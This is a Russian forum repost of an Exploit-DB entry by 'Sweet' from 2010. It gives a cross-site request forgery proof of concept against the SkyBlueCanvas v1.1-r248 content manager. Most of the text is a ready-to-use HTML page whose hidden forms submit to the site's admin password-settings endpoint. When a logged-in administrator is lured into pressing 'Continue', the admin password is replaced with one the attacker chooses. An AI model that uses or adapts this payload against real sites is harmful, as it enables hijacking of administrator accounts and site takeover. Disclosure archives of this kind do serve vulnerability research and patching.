- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15080
- Проверка EDB
-
- Пройдено
- Автор
- SWEET
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-09-22
Код:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
1 [+]Exploit Title: Skybluecanvas.v1.1-r248 CSRF vulnirabilitie 0
0 [+]Date: 022/09/2010 1
1 [+]Author: Sweet 0
0 [+]Contact : [email protected] 0
1 [+]Software Link: www.skybluecanvas.com 0
0 [+]Download: www.skybluecanvas.com/downloads.html 1
1 [+]Version:v1.1-r248 0
0 [+]Tested on: Backtrack 4 1
1 [+]Risk : Hight 0
0 [+]Description : 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
----=PoC=----
<html>
<body>
<h3>Skybluecanvas.v1.1-r248 CSRF vulnirabilitie</h3>
<form method="POST" name="form0" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="username" value="admin"/> <!-- User name -->
<input type="hidden" name="password" value="password"/> <!-- your password -->
<input type="hidden" name="confirm" value="password"/> <!-- confirm password -->
<p> Press Continue to update admin information <input type="submit" name="submit" value="Continue"/> </p>
</form>
<form method="GET" name="form1" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form2" action="http://target.com/path/admin.php">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form3" action="http://target.com/path/admin.php?mgr=login&js=1">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
(thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org
et 1,2,3 viva L'Algerie :))- Источник
- www.exploit-db.com
